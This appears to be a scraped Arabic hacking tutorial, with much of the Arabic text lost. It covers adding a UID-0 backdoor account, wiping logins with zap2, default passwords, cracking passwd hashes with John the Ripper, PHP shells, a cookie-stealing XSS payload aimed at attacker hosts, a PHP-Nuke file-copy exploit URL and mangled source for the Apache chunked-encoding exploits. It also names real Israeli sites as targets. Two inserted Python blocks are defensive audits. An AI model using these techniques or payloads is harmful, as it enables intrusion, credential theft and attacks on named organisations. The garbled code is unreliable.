-: vi
sh-2.03$ vi /etc/passwd
vi

luser:passwd:uid:gid:startdir:shell
uid & gid =0
:
dood::0:0:dood:/:/bin/sh

sh-2.03$ su dood
sh-2.03$ whoami
dood

.. dood gid uid


-3 bindshell
bindshell telnetd ..
TCP UDP
..


TCP UDP
-: .. ..
..

Last login: Sun Sep 24 10:32:14 from <yourIPaddress>.


-:
..
..
=(

/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog
lled ..
...
ftp
wted lled
who
sh-2.03$ who
root     tty1     Sep 25 18:18

zap2
: luser
sh-2.03$ ./zap2 luser
Zap2!
sh-2.03$ who
sh-2.03$
:

..
.

" "
> <
> : <
...



FreeServers.com
:











Caller ID
...
notepade

Hakkerz.home.ml.org
html

@Blahblahblah

header

IP Whois

finger
@Finger

scan ports IP
Linux /Unix systems
Exploit Generator

linux 21
FTP 23 TelNet
Telnet Anonymous

hakkerz.home.ml.org telnet 23
www telnet.Victim.com
telnet www
whois
21 ftp
SYST 80 http
Whats
?Running


Login: root
Password: root
linux
telnet

ACCOUNT: PASSWORD
(login) root: (password) root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install

demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon


whois unix
passwd
ftp
internet explorer
IP jammer .hakkerz.home.ml.org

ftp:// abc.net /ftp://ftp.abc.net ftp


whois \ etc
passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
kangaroo 3a62i9qr

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh

* s ?xs
John the Ripper 1.5 .

" ) PHP Shell ( "


> < pharaonics
>> Arab VieruZ:

...

(:

:

:

PHP Shell
**-----------------------------------------------
:

**-----------------------------------------------
ls -a :

**-----------------------------------------------
cat -e : cat

**-----------------------------------------------
rm -f :

**-----------------------------------------------
rm -d :

**-----------------------------------------------
cp -i :

**-----------------------------------------------
mv :

**-----------------------------------------------
:
--help

ls --help :
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------

-1
-2
-3
-4
-5
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
!!!

-1
: hacked.txt
**-----------------------------------------------
-2



**-----------------------------------------------
-3 .

" ) PHP Shell ( "


> < pharaonics
>> Arab VieruZ:


**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
PHP Shell 2
.
**-----------------------------------------------
-1 My SQL config.php
PHP Shell

cat config.php

**-----------------------------------------------
-2 .htpasswd

.htaccess
/home/site/.htpasswds/forum/admin/passwd :
cat /home/site/.htpasswds/forum/admin/passwd :
DES
user:nymw4oS3oerdY
**-----------------------------------------------
-3 : service.pwd
DES
:
_vti_pvt
cat /home/site/www/_vti_pvt/service.pwd :
: DeXXa
user:nymw4oS3oerdY
**-----------------------------------------------
-4 :
phpMyAdmin

config.php
!!

" ) PHP Shell ( "


> < pharaonics
>> Arab VieruZ:


**-----------------------------------
-1 :
:
/home
: /
ls -a /home

ls -a /home/SITE
= SITE
**-----------------------------------
-2 :
home
:

:
/home/site/public_html

/home/site/www

**-----------------------------------
-3

.

" " anmap


><
> : <
:
- nmap
:
-
:

.
:
UDP
TCP connect()
TCP SYN (half open)
ftp proxy (bounce attack)
Reverse-ident
ICMP (ping sweep)
FIN
ACK sweep
Xmas Tree
SYN sweep
and Null scan.
..:
remote OS detection via TCP/IP fingerprinting
stealth scanning
dynamic delay and retransmission calculations
parallel scanning

detection of down hosts via parallel pings


decoy scanning
port filtering detection
direct (non-portmapper) RPC scanning
fragmentation scanning
flexible target and port specification

.



)(


)(



:

TCP sequencability


.

" "
> <
><network access :







) (
%50 %50


aswind.COM
ip
INTERNIC.NET


INTERNIC.NET
:
NSLOOKUP
SET TYPE = ALL
aswind.COM
:
Domain Name: ASWIND.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.onlinenic.com/
Name Server: DNS.ASWIND.COM
Name Server: NS1.ASWIND.COM
Updated Date: 01-apr-2002
aswind.com DNS = 2
2 DNS DNS
DNS
DNS
Ip aswind.com
6 .
IP DNS
DNS WIN2K DNS
DNS
DNS
HowIS
IP
LMHOSTS NetBios IP

C 200.200.200.0 LMHOSTS
NetBios N2 = 200.200.200.2 Net view
\\servername N1 N254
1 254

\
Administrator


Windows

username and password net user




Messenger Service
NetBios
IP 200.200.200.200 nbtstat -a 200.200.200.200
MSBROWSER )
(
John IP 200.200.200.50
Nbtstat -a 200.200.200.50 john

johnPC
) ( Administrator

Messenger Service )
(
MSBROWSER nbtstat -a




nt senstiver )
(.


L0phtCrack.

" " Cross Site Scripting


> <
><tcp :
:
HTML
JAVASCRIPT ,PERL ,CGI ,VBSCRIPT

===========================================================
====================================
:
*
* VBULLETIN YaBB and UBB

*
*
===========================================================
=====================================
:


... ..
===========================================================
=====================================
:
...


.


:
Hello FOLKS board. This is a message.
<SCRIPT>malicious code</SCRIPT>
This is the end of my message.
malicious code
...
HTML
<script>document.write('<img src="http://my_ip_address/'+document.cookie+'">');</script>


<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A>

comment.cgi

mycomment



.

<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A>

BADFILE

cross-site scripting " "

CSS

cross-site scripting CASCADE style sheets



<SCRIPT>, <OBJECT>, <APPLET>, and <EMBED>
<form> HTML
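As an added example (not code from the book), the three payloads quoted in this section are pushed through two output filters: the tag blocklist the page recommends, written the naive case-sensitive way, and HTML entity encoding. The message-board template, the `comment.cgi` parameter parsing and the `has_script_markup` check are assumptions made for the demonstration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed inputs: the three payloads shown on this page, verbatim.
INLINE_SCRIPT = ("Hello FOLKS board. This is a message.\n"
                 "<SCRIPT>malicious code</SCRIPT>\n"
                 "This is the end of my message.")
COOKIE_STEALER = ("<script>document.write('<img src=\"http://my_ip_address/'"
                  "+document.cookie+'\">');</script>")
COMMENT_CGI_LINK = ("http://example.com/comment.cgi?mycomment="
                    "<SCRIPT SRC='http://bad-site/badfile'></SCRIPT>")

# The exact spellings the page lists, as a case-sensitive exact-tag blocklist.
BLOCKED_TAGS = ("<SCRIPT>", "</SCRIPT>", "<OBJECT>", "</OBJECT>", "<APPLET>",
                "</APPLET>", "<EMBED>", "<FORM>", "</FORM>")


def naive_blocklist(text):
    """Strip the blocked tags by exact string match (what a quick filter often does)."""
    for tag in BLOCKED_TAGS:
        text = text.replace(tag, "")
    return text


def encode_for_html(text):
    """Entity-encode < > & \" ' so the browser shows the comment as text, never markup."""
    return html.escape(text, quote=True)


def render_comment(comment, sanitizer):
    """Assumed message-board template; the sanitizer runs at output time."""
    return "<html><body><p>%s</p></body></html>" % sanitizer(comment)


def comment_from_cgi_url(url):
    """What comment.cgi receives as mycomment= from the crafted link (reflected case)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("mycomment", [""])[0]


def has_script_markup(page):
    """Detection check: does a live <script ...> start tag survive in the rendered page?"""
    return "<script" in page.lower()


def compare_filters():
    """Run every payload through both filters; True means script markup survived."""
    payloads = {
        "inline <SCRIPT>": INLINE_SCRIPT,
        "cookie stealer": COOKIE_STEALER,
        "comment.cgi link": comment_from_cgi_url(COMMENT_CGI_LINK),
    }
    return {
        name: {
            "blocklist": has_script_markup(render_comment(p, naive_blocklist)),
            "encoded": has_script_markup(render_comment(p, encode_for_html)),
        }
        for name, p in payloads.items()
    }


if __name__ == "__main__":
    for name, result in compare_filters().items():
        print("%-18s blocklist leaks script: %-5s  encoding leaks script: %s"
              % (name, result["blocklist"], result["encoded"]))
```

The blocklist catches only the first payload: the second uses a lowercase `<script>` and the third a `<SCRIPT SRC=...>` start tag with an attribute, neither of which matches the exact spellings, while entity encoding neutralises all three.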

=========================================================
:
http://www.cert.org/advisories/CA-2000-02.html
http://www.perl.com/pub/a/2002/02/20/css.html

" "
> <
> :<
, ...
, - - - - ......

........... :
.
.
.
.
.
.
.
.
.
.
.
.
.
:
==================================================
=
--><h3>put your text here<xmp><plaintext
==================================================

.... put your text here ....


:
=====
!

" "
> <
><Dr^FunnY :
... html


..... ...
" "
" ... "HTML ...
(: .

.

" "
> <
= Exploit =
:

..
:
-1
super scan
.
-2
.

www.netcraft.net
!.!!.. ...
-3
-4


/....../www.thesite.com
:
*.pl

Active Perl

*.c

*.sh

www.securiteam.com
www.securityfocus.com
www.ukrt.f2s.com
www.ussrback.com
www.packetstorm.securify.com
www.secureroot.com
www.rootshell.com
.

.

.. shadowed
.encryption

root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp

...
x ..
:
root:x:0:1:Super-User:/:/sbin/sh
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
= root
= x

shadowed

shadow file

= token
Linux    : /etc/shadow                          token = *
SunOS    : /etc/shadow                          token = *
FreeBSD  : /etc/master.passwd or /etc/shadow    token = * or x
IRIX     : /etc/shadow                          token = x
AIX      : /etc/security/passwd                 token = !
ConvexOS : /etc/shadow or /etc/shadpw           token = *

root:EpGw4GekZ1B9U:11390::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935::::::
lp:NP:6445::::::
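An added audit script (not from the book) that checks for three things shown on this page: the `dood::0:0` entry added to /etc/passwd as a backdoor, the sushi setuid copy of /bin/sh (chmod 4775), and password hashes that are exposed because the file is not shadowed. The sample entries are constructed from the page's own listings; the `(path, mode, uid)` listing format is an assumption standing in for os.stat() results.

```python
import stat
from dataclasses import dataclass

# Values that mean "no hash here": the shadow tokens the page lists (x, *, !)
# plus the NP / *LK* / !! lock markers seen in Solaris and Linux shadow files.
SHADOW_TOKENS = {"x", "*", "!", "!!", "NP", "*LK*"}
SEVERITY_RANK = {"HIGH": 0, "MEDIUM": 1}


@dataclass
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd(5) lines (name:passwd:uid:gid:gecos:home:shell)."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("line %d: expected 7 fields, got %d" % (lineno, len(fields)))
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def classify_password_field(passwd):
    """'empty' = no password needed; 'shadowed' = token only; 'hash-exposed' = crackable."""
    if passwd == "":
        return "empty"
    if passwd in SHADOW_TOKENS:
        return "shadowed"
    return "hash-exposed"


def audit_passwd(text):
    """Return (severity, account, finding) tuples, HIGH before MEDIUM, file order within."""
    findings = []
    for e in parse_passwd(text):
        kind = classify_password_field(e.passwd)
        if e.uid == 0 and e.name != "root":
            # Any UID-0 name is root-equivalent, whatever it is called ("dood" on this page).
            # The Solaris listing on the page also has smtp at UID 0; it is locked in the
            # shadow file, but it still belongs on the review list.
            findings.append(("HIGH", e.name, "extra UID-0 account"))
        if kind == "empty" and e.shell not in ("/bin/false", "/sbin/nologin"):
            findings.append(("HIGH", e.name, "empty password field with a login shell"))
        if kind == "hash-exposed":
            # The hash sits in the world-readable file instead of the shadow file.
            findings.append(("MEDIUM", e.name, "password hash not shadowed"))
    return sorted(findings, key=lambda f: SEVERITY_RANK[f[0]])


def suid_root_files(listing):
    """listing: (path, st_mode, st_uid) triples as os.stat() would give them.
    Returns root-owned setuid files; a 'cp /bin/sh /dev/nul; chmod 4775 /dev/nul'
    sushi shows up here, so diff the result against a known-good baseline."""
    return [path for path, mode, uid in listing if uid == 0 and mode & stat.S_ISUID]


# Constructed sample built from the listings on this page.
SAMPLE_PASSWD = """\
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
smtp:x:0:0:Mail Daemon User:/:
kangaroo:3A62i9qr:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
dood::0:0:dood:/:/bin/sh
"""

# Constructed stat() results: the sushi from this page next to a legitimate setuid binary.
SAMPLE_LISTING = [
    ("/dev/nul", 0o104775, 0),              # cp /bin/sh /dev/nul; chmod 4775 /dev/nul
    ("/bin/sh", 0o100755, 0),
    ("/usr/bin/passwd", 0o104755, 0),       # legitimately setuid root
    ("/home/luser/notes", 0o104755, 1012),  # setuid but not root-owned
]

if __name__ == "__main__":
    for severity, account, finding in audit_passwd(SAMPLE_PASSWD):
        print("%-6s %-10s %s" % (severity, account, finding))
    print("setuid root:", suid_root_files(SAMPLE_LISTING))
```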

EpGw4GekZ1B9U


John the ripper
.
x

:

john passwd
passwd

:
John the Ripper Version 1.3 Copyright (c) 1996, 97 by Solar Designer
Loaded 1 password
v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****
DONE


john.pot
.

" "
> <
>< icer :
:
1
2 ) (
3 ...
4 ...

: a face at the interface


..
...
http ..
scanner ....
BOF (buffer overflow), DoS (denial of service),
DoS ...

....
DoS .
DoS GET / POST
OVERLOAD )
24 ( .... OFFLINE

1

.. ..


..
threads
cgi scanners
..

<<< shadow security scanner...


..... rootshell.com

red hat 7.2

...... red hat 7.2

2
) ( shadow ..

...
url .. ..
url rootshell.com
%99 ..
.......

3 :
..
.. commands ..

, http BOF
..
..
....
config.inc

... DES/MD5 .... /etc/passwd ...


DoS
DoS

... ..

4 :
:
www.insecure.org/ securityfocus.com/ packetstorm.securify.com/
www.rootshell.com/ (:

" "
><
><oOoDa BE$T :
:
.txt :
..
,.. ..
.c :
.. ..
)_ (compile )(_
... .. Linux
.. Shell Account
:
----> gcc filename.c
:
----> a.out ..

..
:
./a.out xxx.xxx.xxx.xxx
:
.pl :
.. Linux Shell Account
exploit :
perl filename.pl xxx.xxx.xxx.xxx

./filename xxx.xxx.xxx.xxx

" "
> <
><DeadLine :
:
:
Microsoft-IIS/5.0 on Windows 2000
98
98 :
Web Folders :
:
:
My Computer
My Computer

Web Folders
:
Add Web Folder
: Add Web Folder
Type the location to add
:
http://hostname.com/

hostname

:
mail.talcar.co.il
daihatsu-israel.co.il
daewoo-israel.co.il
:
http://192.117.143.121/
Next :

finish :
Web Folder :
:
http://www.israwine.co.il/ 212.199.43.84
:

.

" "
<>
>Arab VireruZ :>
:
twlc: here your 0day from LucisFero and supergate
Posted on Monday, September 24 @ 14:25:58 CDT
topic: advisories
twlc security division
24/09/2001
Php nuke BUGGED.
Found by:
LucisFero and supergate
./twlc
Summary
This time the bug is really dangerous...it allows you to 'cp' any file on
the box... or even upload files...
Systems Affected
all the versions ARE vulnerable
except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is
bugged)
Explanation
Do you need sql password?
http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt

the admin 'login' page will be prompted just go to
http://www.server.net/images/hacked.txt and you will see config.php that
as everyone knows contain the sql's passwords, you can even upload
files...i leave you the 'fun' to find all the ways to use it... and try to don't
be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke
and NOT TO LET YOU HAVE FUN.
let me explain you the bug... admin.php contains this routine:
$basedir = dirname($SCRIPT_FILENAME);
$textrows = 20;
$textcols = 85;
$udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/";
if($cancel) $op="FileManager";
if($upload) {
copy($userfile,$basedir.$wdir.$userfile_name);
$lastaction = ""._UPLOADED." $userfile_name --> $wdir";
// This need a rewrite -------------------------------------> OMG! WE TOTALY AGREEEEEEEE lmao
//include("header.php");
//GraphicAdmin($hlpfile);
//html_header();
//displaydir();
$wdir2="/";
chdir($basedir . $wdir2);
//CloseTable();
//include("footer.php");
Header("Location: admin.php?op=FileManager");
exit;
}
that doesn't do a check to see if you are logged as admin or no... so you
can use it anyway...
Solution
we erased the function... cause we wanted to remove the file manager
anyway- but i suggest you to do the same... -to upload files use FTP-
conclusions:
yet another bug of php nuke... this software is used by thousands of
people... (we run something based on it too) i hope that this time the
author will reply soon and will release a patch too! as i said before just
don't try to be a script kiddie or we simply WON'T post anymore this kind
of advisories. Prolly the funny thing is that who first discovered the bug
was LucisFero that... 2 hours before didn't know php ... so i (supergate)
fear him and you should too.
posted at:
http://www.twlc.net article http://www.twlc.net/article.php?sid=421
bugtraq@securityfocus.com
http://www.phpnuke.org -good luck-
http://sourceforge.net/tracker/?group_id=7511 Project: PHP-Nuke Web
Portal System
and of course mailed to the author of php nuke
contacts (bugs, ideas, insults, cool girls... remember that trojans are
directed to /dev/null):
lucisfero@twlc.net
supergate@twlc.net
http://www.twlc.net (yes we are patched)
peace out pimps. bella a tutti.
eof
-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=
:
http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt

=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-
==-=-=-=-=-=-=-=-=-=-

http://www.server.net/admin.php?upload=1&file=config.php&file_name=ultramode.txt&wdir=/&userfile=config.php&userfile_name=ultramode.txt
=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-
==-=-=-=-=-=-=-=-=-=-
:
= config.php ultramode.txt
(-:
http://server.com/ultramode.txt
=-

-1 server.com
-2 http://server.com/nuke :
-3 5.2 .

" " Chunked


>

<angels-bytes

Chunked Apache angels-bytes


Retina Apache Chunked Scanner
254 .
2.0.39

http://www.apache.org/dist/httpd/binaries

1.3.24 2 2 dev-2.0.36


))*/ angels-bytes.com ((
*/
*/ */
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it#
/* failed
define RET_ADDR_INC 512#
define MEMCPY_s1_OWADDR_DELTA -146#
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#
define REP_POPULATOR 24#
define REP_RET_ADDR 6#
define REP_ZERO 36#
define REP_SHELLCODE 24#
define NOPCOUNT 1024#
define NOP 0x41#
'\\define PADDING_1 \\'A#
'\\define PADDING_2 \\'B#
'\\define PADDING_3 \\'C#
;(define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s#
;define PUT_BYTES(n, b) memset(p, b, n); p += n#
define SHELLCODE_LOCALPORT_OFF 30#
= []char shellcode
\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\\\\ "\\\
\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8 \\\
"\\\x1f\\
\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\\\\ "\\\
\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a \\\
"\\\x02\\
\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\\\\ "\\\
\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24 \\\
"\\\x04\\
\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\\\\ "\\\
\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00 \\\
"\\\xb8\\
\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff \\\\ "\\\
\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08 \\\
"\\\x03\\
\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b \\\\ "\\\
\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01 \\\
"\\\x89\\

\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\\\\ "\\\
\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd \\\
"\\\x80\\
\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\\\\ "\\\
\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0 \\\
"\\\x50\\
\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\\\\ "\\\
\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\
;"\\\xcc\\
} struct
;char *type
;u_long retaddr
!targets[] = { // hehe, yes theo, that say OpenBSD here {
,{ OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae"\\\ }
;{
} ([]int main(int argc, char *argv
;char *hostp, *portp
;unsigned char buf[512], *expbuf, *p
;int i, j, lport
;int sock
;int bruteforce, owned, progress
;u_long retaddr
;struct sockaddr_in sin, from
} (if(argc != 3
;([printf(\\\"Usage: %s \\\\n\\\", argv[0
;("\\\printf(\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n
printf(\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000
;("\\\127.0.0.1:8080\\\\n
;("\\\printf(\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n
;("\\\printf(\\\"Target ID / Target specification\\\\n
(++for(i = 0; i < sizeof(targets)/8; i
;(printf(\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type
;return -1
{

;("\\\:"\\\ ,[hostp = strtok(argv[2


(if((portp = strtok(NULL, \\\":\\\")) == NULL
;"\\\portp = \\\"80
;(retaddr = strtoul(argv[1], NULL, 16
} (if(retaddr < sizeof(targets)/8
;retaddr = targets[retaddr].retaddr
;bruteforce = 0
{
else
;bruteforce = 1
;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
} (for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC
/* skip invalid return adresses */
;i = retaddr & 0xff
(if(i == 0x0a || i == 0x0d
;++retaddr
((else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4
;continue
;(sock = socket(AF_INET, SOCK_STREAM, 0
;sin.sin_family = AF_INET
;(sin.sin_addr.s_addr = inet_addr(hostp
;((sin.sin_port = htons(atoi(portp
(if(!progress
;("\\\ ..printf(\\\"\\\\n[*] Connecting
;(fflush(stdout
} (if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
/* Setup the local port in our shellcode */
;(i = sizeof(from
} (if(getsockname(sock, (struct sockaddr *) & from, &i) != 0
;("\\\()perror(\\\"getsockname
;(exit(1
{
;(lport = ntohs(from.sin_port

;shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff


;shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *
(REP_SHELLCODE
PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *)) +
;((REP_POPULATOR
;("\\\PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: apache-scalp.c\\\\r\\\\n
} (++for (i = 0; i < REP_SHELLCODE; i
;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_3, PADDING_3
;("\\\ :"\\\)PUT_STRING
;(PUT_BYTES(NOPCOUNT, NOP
;(memcpy(p, shellcode, sizeof(shellcode) - 1
;p += sizeof(shellcode) - 1
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
} (++for (i = 0; i < REP_POPULATOR; i
;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_1, PADDING_1
;("\\\ :"\\\)PUT_STRING
} (++for (j = 0; j < REP_RET_ADDR; j
;p++ = retaddr & 0xff*
;p++ = (retaddr >> 8) & 0xff*
;p++ = (retaddr >> 16) & 0xff*
;p++ = (retaddr >> 24) & 0xff*
{
;(PUT_BYTES(REP_ZERO, 0
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
;("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n
;(snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2
;(PUT_STRING(buf
;(PUT_BYTES(PADSIZE_2, PADDING_2
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\",
;(MEMCPY_s1_OWADDR_DELTA
;(PUT_STRING(buf
;(write(sock, expbuf, p - expbuf
;++progress
(if((progress%70) == 0
;progress = 1

} (if(progress == 1
;((memset(buf, 0, sizeof(buf
sprintf(buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport
,"\\\%u
;(retaddr, (unsigned int)(p - expbuf), lport
;((memset(buf + strlen(buf), \\' \\', 74 - strlen(buf
;(puts(buf
(if(bruteforce
;('\\;'\\)putchar
{
else
;('\\putchar((rand()%2)? \\'P\\': \\'p
;(fflush(stdout
} (while (1
;fd_set fds
;int n
;struct timeval tv
;tv.tv_sec = EXPLOIT_TIMEOUT
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
} (if(select(sock + 1, &fds, NULL, NULL, &tv) > 0
} ((if(FD_ISSET(sock, &fds
(if((n = read(sock, buf, sizeof(buf) - 1)) <= 0
;break
} (if(!owned && n >= 4 && memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) == 0
;("\\\printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n
;(printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr
sprintf(expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD local
;("\\\kernel exploit to gain instant r00t\\\\n
;((write(sock, expbuf, strlen(expbuf
;++owned
{
;(write(1, buf, n
{
} ((if(FD_ISSET(0, &fds
(if((n = read(0, buf, sizeof(buf) - 1)) < 0
;(exit(1
;(write(sock, buf, n

{
{
(if(!owned
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
;("\\\fprintf(stderr, \\\"Ooops.. hehehe!\\\\n
;return -1
{
{
;return 0
{
:Exploit #2
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
__ifdef __linux#
include#
endif#
/* define HOST_PARAM \\\"apache-nosejob.c\\\" /* The Host: field#
define DEFAULT_CMDZ \\\"uname -a;id;echo \\'hehe, now use another#
"\\\bug/backdoor/feature (hi Theo!) to gain instant r00t\\';\\\\n
define RET_ADDR_INC 512#
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#

define REP_POPULATOR 24#


define REP_SHELLCODE 24#
define NOPCOUNT 1024#
define NOP 0x41#
'\\define PADDING_1 \\'A#
'\\define PADDING_2 \\'B#
'\\define PADDING_3 \\'C#
;(define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s#
;define PUT_BYTES(n, b) memset(p, b, n); p += n#
= []char shellcode
\x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\\\\ "\\\
\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6 \\\
"\\\x04\\\\x24\\
\x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\\\\ "\\\
\\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1 \\\
"\\\xea\\\\x31\\
\xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\\\\ "\\\
\\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80 \\\
"\\\x7c\\\\x24\\
\x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\\\\ "\\\
\\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04 \\\
"\\\x20\\\\x89\\
\x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\\\\ "\\\
\\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24 \\\
"\\\x14\\\\x89\\
